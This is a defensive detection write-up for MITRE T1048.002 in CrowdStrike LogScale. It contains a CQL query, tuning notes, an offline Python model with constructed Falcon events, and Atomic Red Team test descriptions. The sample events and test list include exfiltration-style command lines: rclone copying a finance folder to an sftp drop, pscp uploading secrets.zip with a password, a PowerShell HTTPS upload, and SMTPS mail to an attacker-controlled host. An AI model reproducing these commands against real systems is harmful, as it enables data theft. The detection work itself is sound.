Detect Exfiltration Over Asymmetric Encrypted Non-C2 Protocol in CrowdStrike LogScale
Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol that is separate from the existing command and control channel. Common choices are HTTPS/TLS, SFTP, SCP, SMTPS, and FTPS. These protocols use public-key cryptography to authenticate the server and negotiate a session key, then protect the bulk transfer with symmetric encryption, so the payload is opaque to network inspection and the traffic is indistinguishable, on the wire, from ordinary business use of the same ports. Detection therefore leans on endpoint telemetry: which process opened the connection, with what command line, and to which destination. Threat actors such as APT28, CURIUM, and Storm-1811 have used HTTPS, SMTPS, and SCP respectively for data exfiltration.
MITRE ATT&CK
- Tactic: Exfiltration
- Sub-technique: T1048.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
- Canonical reference: https://attack.mitre.org/techniques/T1048/002/
LogScale Detection Query
// Process starts (including synthetic ones) and outbound IPv4 connections from the Falcon sensor
#event_simpleName=/^(ProcessRollup2|SyntheticProcessRollup2|NetworkConnectIP4)$/
| case {
    // Branch 1: known transfer tools, or cmd/PowerShell invoking them. Falcon PID of a process start is TargetProcessId.
    #event_simpleName=/^(ProcessRollup2|SyntheticProcessRollup2)$/
    | (ImageFileName=/\\(rclone|winscp|pscp|psftp|filezilla|sftp|scp|curl|wget)\.exe$/i
        OR (ImageFileName=/\\(powershell|cmd)\.exe$/i AND CommandLine=/(sftp|\bscp\b|smtps|ftps|webdav|rclone|winscp)/i)
        OR (ImageFileName=/\\curl\.exe$/i AND CommandLine=/(--ssl|--tls|sftp:\/\/|ftps:\/\/)/i))
    | falconPID := TargetProcessId
    | DetectionType := "ProcessExecution";
    // Branch 2: connections on encrypted-transfer ports to addresses outside RFC 1918 and loopback.
    // NetworkConnectIP4 carries no ImageFileName or CommandLine; its Falcon PID is ContextProcessId.
    #event_simpleName="NetworkConnectIP4"
    | in(RemotePort, values=["21", "22", "443", "465", "587", "990", "993", "8443"])
    | !cidr(RemoteAddressIP4, subnet=["10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8"])
    | falconPID := ContextProcessId
    | DetectionType := "NetworkConnection"
}
// Stitch process-start and connection events for the same process on the same sensor
| groupBy([aid, falconPID], function=[
    min(@timestamp, as=FirstSeen),
    collect([ComputerName, UserName, ImageFileName, CommandLine, ParentBaseFileName,
             RemoteAddressIP4, RemotePort, DetectionType])
  ], limit=max)
// Drop connections whose originating process never matched Branch 1
| ImageFileName=*
| case {
    ImageFileName=/rclone\.exe$/i          | ToolName := "Rclone";
    ImageFileName=/winscp\.exe$/i          | ToolName := "WinSCP";
    ImageFileName=/\\(pscp|scp)\.exe$/i    | ToolName := "SCP";
    ImageFileName=/\\(psftp|sftp)\.exe$/i  | ToolName := "SFTP";
    ImageFileName=/filezilla\.exe$/i       | ToolName := "FileZilla";
    ImageFileName=/\\(curl|wget)\.exe$/i   | ToolName := "curl/wget";
    CommandLine=/sftp/i                    | ToolName := "SFTP-via-Script";
    CommandLine=/rclone/i                  | ToolName := "Rclone-via-Script";
    * | ToolName := "Unknown"
}
| case { ImageFileName=/rclone\.exe$/i AND CommandLine=/\b(copy|sync|move)\b/i | RcloneCopy := "true"; * | RcloneCopy := "false" }
| case { ImageFileName=/rclone\.exe$/i AND CommandLine=/(sftp|s3|gdrive|onedrive|mega|box|dropbox|webdav)/i | RcloneRemote := "true"; * | RcloneRemote := "false" }
| table([FirstSeen, aid, ComputerName, UserName, ImageFileName, CommandLine, ParentBaseFileName, RemoteAddressIP4, RemotePort, DetectionType, ToolName, RcloneCopy, RcloneRemote])
| sort(FirstSeen, order=desc)
CrowdStrike Falcon LogScale (CQL) detection for T1048.002, exfiltration over asymmetrically encrypted non-C2 protocols. A case block splits the pipeline: ProcessRollup2/SyntheticProcessRollup2 events catch known transfer tools and cmd/PowerShell invocations that reference them, while NetworkConnectIP4 events catch connections on encrypted-protocol ports (21/22/443/465/587/990/993/8443) to addresses outside RFC 1918 space and loopback. Because NetworkConnectIP4 does not carry ImageFileName or CommandLine, the two event types are correlated per process in the groupBy on aid and the Falcon PID (TargetProcessId on a process start, ContextProcessId on a connection), and groups without a matching process start are dropped. Each result is enriched with a tool classification, Rclone copy/sync/move and remote-type flags, and the destination address and port. Note that the network branch admits every outbound connection on those ports before the groupBy, so run it over a bounded time window or trim the port list on high-volume tenants.
Data Sources
Required Tables
- ProcessRollup2 and SyntheticProcessRollup2: CrowdStrike Falcon sensor process-start events (ImageFileName, CommandLine, UserName, ParentBaseFileName, TargetProcessId)
- NetworkConnectIP4: Falcon sensor outbound IPv4 connection events (RemoteAddressIP4, RemotePort, ContextProcessId); carries no image or command-line fields, so it must be correlated to the process start by aid and Falcon PID
False Positives & Tuning
- Authorized IT staff using rclone, WinSCP, or similar transfer tools for sanctioned data migration or backup operations to approved cloud endpoints or managed service providers
- Development or DevOps workflows using sftp, scp, or curl to deploy application code or upload packages to remote servers as part of established CI/CD pipelines
- Managed security or monitoring agents that communicate over HTTPS to vendor cloud infrastructure for telemetry upload, license validation, or policy retrieval
- Endpoint backup agents configured to transmit encrypted backups via SFTP or HTTPS to off-site or cloud-hosted storage destinations on a scheduled basis
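The following is an added example, not code from the original rule package: an offline Python model of the query's logic (the per-process correlation of process starts with connections, the port list and private-range exclusion, the ToolName and Rclone flags) plus the destination allowlist that the tuning notes above call for. It replays constructed Falcon-style events whose field names follow Falcon sensor telemetry (aid, TargetProcessId, ContextProcessId, ImageFileName, CommandLine, RemoteAddressIP4, RemotePort); the events, the APPROVED_DESTINATIONS set and the helper names are assumptions for illustration. The sample set mirrors Atomic tests 1 to 3 from the Testing Methodology and adds a sanctioned backup job and a browser connection, so the run shows which of them alert and why the others do not.

```python
"""Offline model of the LogScale T1048.002 query. Added example with constructed events;
field names follow Falcon sensor telemetry, APPROVED_DESTINATIONS is a hypothetical allowlist."""
import ipaddress
import re
from collections import defaultdict

TOOL_RE = re.compile(r"\\(rclone|winscp|pscp|psftp|filezilla|sftp|scp|curl|wget)\.exe$", re.I)
SHELL_RE = re.compile(r"\\(powershell|cmd)\.exe$", re.I)
SCRIPT_RE = re.compile(r"(sftp|\bscp\b|smtps|ftps|webdav|rclone|winscp)", re.I)
CURL_RE = re.compile(r"\\curl\.exe$", re.I)
CURL_TLS_RE = re.compile(r"(--ssl|--tls|sftp://|ftps://)", re.I)
ENCRYPTED_PORTS = {21, 22, 443, 465, 587, 990, 993, 8443}
# Same exclusions as the query: RFC 1918 ranges plus loopback
PRIVATE_NETS = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
# Tuning allowlist (constructed, hypothetical): (tool, destination) pairs sanctioned for backup/CI use
APPROVED_DESTINATIONS = {("rclone.exe", "203.0.113.10"), ("scp.exe", "203.0.113.20")}
TOOL_LABELS = [("rclone.exe", "Rclone"), ("winscp.exe", "WinSCP"), ("pscp.exe", "SCP"),
               ("scp.exe", "SCP"), ("psftp.exe", "SFTP"), ("sftp.exe", "SFTP"),
               ("filezilla.exe", "FileZilla"), ("curl.exe", "curl/wget"), ("wget.exe", "curl/wget")]


def base_name(image):
    """\\Device\\HarddiskVolume3\\Tools\\rclone.exe -> rclone.exe"""
    return image.rsplit("\\", 1)[-1].lower()


def process_matches(ev):
    """Branch 1: transfer tool, cmd/PowerShell referencing one, or curl with TLS/SFTP/FTPS."""
    img, cmd = ev["ImageFileName"], ev.get("CommandLine", "")
    return bool(TOOL_RE.search(img)
                or (SHELL_RE.search(img) and SCRIPT_RE.search(cmd))
                or (CURL_RE.search(img) and CURL_TLS_RE.search(cmd)))


def network_matches(ev):
    """Branch 2: encrypted-transfer port and a destination outside private/loopback space."""
    ip = ipaddress.ip_address(ev["RemoteAddressIP4"])
    return int(ev["RemotePort"]) in ENCRYPTED_PORTS and not any(ip in net for net in PRIVATE_NETS)


def classify(image, cmd):
    """ToolName with the same precedence as the query's case block."""
    name = base_name(image)
    for exe, label in TOOL_LABELS:
        if name == exe:
            return label
    if re.search("sftp", cmd, re.I):
        return "SFTP-via-Script"
    if re.search("rclone", cmd, re.I):
        return "Rclone-via-Script"
    return "Unknown"


def detect(events):
    """groupBy([aid, falconPID]): a connection alone never alerts; a process start may."""
    groups = defaultdict(lambda: {"process": None, "connections": []})
    for ev in events:
        kind = ev["#event_simpleName"]
        if kind in ("ProcessRollup2", "SyntheticProcessRollup2") and process_matches(ev):
            groups[(ev["aid"], ev["TargetProcessId"])]["process"] = ev
        elif kind == "NetworkConnectIP4" and network_matches(ev):
            groups[(ev["aid"], ev["ContextProcessId"])]["connections"].append(ev)
    alerts = []
    for (aid, pid), g in groups.items():
        proc = g["process"]
        if proc is None:            # e.g. a browser on 443: no matching process start
            continue
        name, cmd = base_name(proc["ImageFileName"]), proc.get("CommandLine", "")
        dests = [c["RemoteAddressIP4"] for c in g["connections"]]
        if dests and all((name, d) in APPROVED_DESTINATIONS for d in dests):
            continue                # tuning: every destination is sanctioned for this tool
        is_rclone = name == "rclone.exe"
        alerts.append({
            "aid": aid, "falconPID": pid, "ImageFileName": proc["ImageFileName"],
            "ToolName": classify(proc["ImageFileName"], cmd),
            "RcloneCopy": is_rclone and bool(re.search(r"\b(copy|sync|move)\b", cmd, re.I)),
            "RcloneRemote": is_rclone and bool(re.search(r"(sftp|s3|gdrive|onedrive|mega|box|dropbox|webdav)", cmd, re.I)),
            "Destinations": dests,
            "DetectionType": ["ProcessExecution"] + (["NetworkConnection"] if dests else []),
        })
    return alerts


def pr2(aid, pid, image, cmd):   # constructed ProcessRollup2 event
    return {"#event_simpleName": "ProcessRollup2", "aid": aid, "TargetProcessId": pid,
            "ImageFileName": image, "CommandLine": cmd}


def nc4(aid, pid, ip, port):     # constructed NetworkConnectIP4 event
    return {"#event_simpleName": "NetworkConnectIP4", "aid": aid, "ContextProcessId": pid,
            "RemoteAddressIP4": ip, "RemotePort": port}


SYS32 = r"\Device\HarddiskVolume3\Windows\System32"
SAMPLE_EVENTS = [  # constructed: Atomic tests 1-3 plus a sanctioned backup and a browser
    pr2("a1", "1001", r"\Device\HarddiskVolume3\Tools\rclone.exe",
        "rclone.exe copy C:\\Finance sftp:192.0.2.1:/drop --sftp-pass x"),
    nc4("a1", "1001", "192.0.2.1", "22"),
    pr2("a1", "1002", r"\Device\HarddiskVolume3\Program Files\PuTTY\pscp.exe",
        "pscp.exe -pw hunter2 secrets.zip user@198.51.100.1:/tmp/"),
    nc4("a1", "1002", "198.51.100.1", "22"),
    pr2("a1", "1003", SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe",
        "powershell.exe -c (New-Object Net.WebClient).UploadData('https://127.0.0.1:4443/',$b)"),
    nc4("a1", "1003", "127.0.0.1", "4443"),     # loopback, port not in list: Test 3 is not covered
    pr2("a2", "2001", r"\Device\HarddiskVolume3\Backup\rclone.exe", "rclone.exe sync D:\\Backups sftp:vault:/"),
    nc4("a2", "2001", "203.0.113.10", "22"),    # sanctioned destination: suppressed by the allowlist
    nc4("a2", "2002", "203.0.113.99", "443"),   # no matching process start: never alerts
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["aid"], alert["falconPID"], alert["ToolName"], alert["Destinations"], alert["DetectionType"])
```

Running it yields two alerts, the rclone copy to 192.0.2.1 and the pscp transfer to 198.51.100.1. The PowerShell WebClient upload produces neither a process nor a network match, which is the same gap the Testing Methodology exposes, and the browser connection is discarded because no process start for its Falcon PID passed Branch 1, which is exactly why the query post-filters on ImageFileName=* after the groupBy.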
Testing Methodology
Validate this detection against 5 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. The expected signals are stated in Sysmon and Microsoft Defender for Endpoint terms; the Falcon equivalents consumed by the query are ProcessRollup2 (process start) and NetworkConnectIP4 (outbound connection). As written, the query fires on Tests 1, 2 and 4, which execute rclone.exe and pscp.exe. Test 3 connects to loopback on port 4443 and Test 5 uses SmtpClient from PowerShell, neither of which the CommandLine patterns or the port list cover, so those two measure a coverage gap rather than confirm the rule. Executable commands and cleanup steps are available with Pro.
- Test 1: Rclone Exfiltration via SFTP
Expected signal: Sysmon Event ID 1: Process Create with Image=rclone.exe, CommandLine containing 'copy', 'sftp://', destination IP, and --sftp-pass flag. Sysmon Event ID 3: Network connection attempt to 192.0.2.1:22. DeviceProcessEvents and DeviceNetworkEvents in MDE will capture the event.
- Test 2: SCP File Transfer to External Host
Expected signal: Sysmon Event ID 1: Process Create with Image=pscp.exe, CommandLine containing destination IP, remote path, and -pw flag (a password in clear text on the command line is itself a forensic indicator). Sysmon Event ID 3: TCP connection attempt to 198.51.100.1:22. Security Event ID 4688 if command-line auditing is enabled.
- Test 3: PowerShell HTTPS Exfiltration via WebClient Upload
Expected signal: Sysmon Event ID 1: Process Create with Image=powershell.exe, CommandLine containing 'Net.WebClient', 'UploadData', and 'https://'. Sysmon Event ID 3: TCP connection attempt to 127.0.0.1:4443. PowerShell ScriptBlock Log Event ID 4104 with full script. DeviceNetworkEvents in MDE will show the HTTPS connection attempt.
- Test 4: Rclone MEGA Cloud Storage Exfiltration Simulation
Expected signal: Sysmon Event ID 11: File creation of rclone_test.conf in %TEMP% containing MEGA credentials. Sysmon Event ID 1: Process Create with Image=rclone.exe, CommandLine referencing --config path and 'mega_remote:'. Sysmon Event ID 22: DNS query for g.api.mega.co.nz. Sysmon Event ID 3: TCP connection attempt to MEGA API endpoints. DeviceFileEvents will capture config file creation.
- Test 5: SMTPS Email Exfiltration via PowerShell
Expected signal: Sysmon Event ID 1: Process Create with Image=powershell.exe, CommandLine containing 'SmtpClient', 'EnableSsl = $true', port 587, and external hostname. Sysmon Event ID 3: TCP connection attempt to smtp.attacker-controlled.com:587. Sysmon Event ID 22: DNS query for attacker-controlled.com. PowerShell ScriptBlock Log Event ID 4104 with full script content.
References (10)
- https://attack.mitre.org/techniques/T1048/002/
- https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc.html
- https://rclone.org/docs/
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md
- https://www.rapid7.com/blog/post/2024/05/10/storm-1811-email-bombing-vishing-attacks/
- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/
- https://learn.microsoft.com/en-us/defender-endpoint/advanced-hunting-devicenetworkevents-table
- https://docs.splunk.com/Documentation/SplunkCloud/latest/SearchReference/CommonStatsFunctions
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation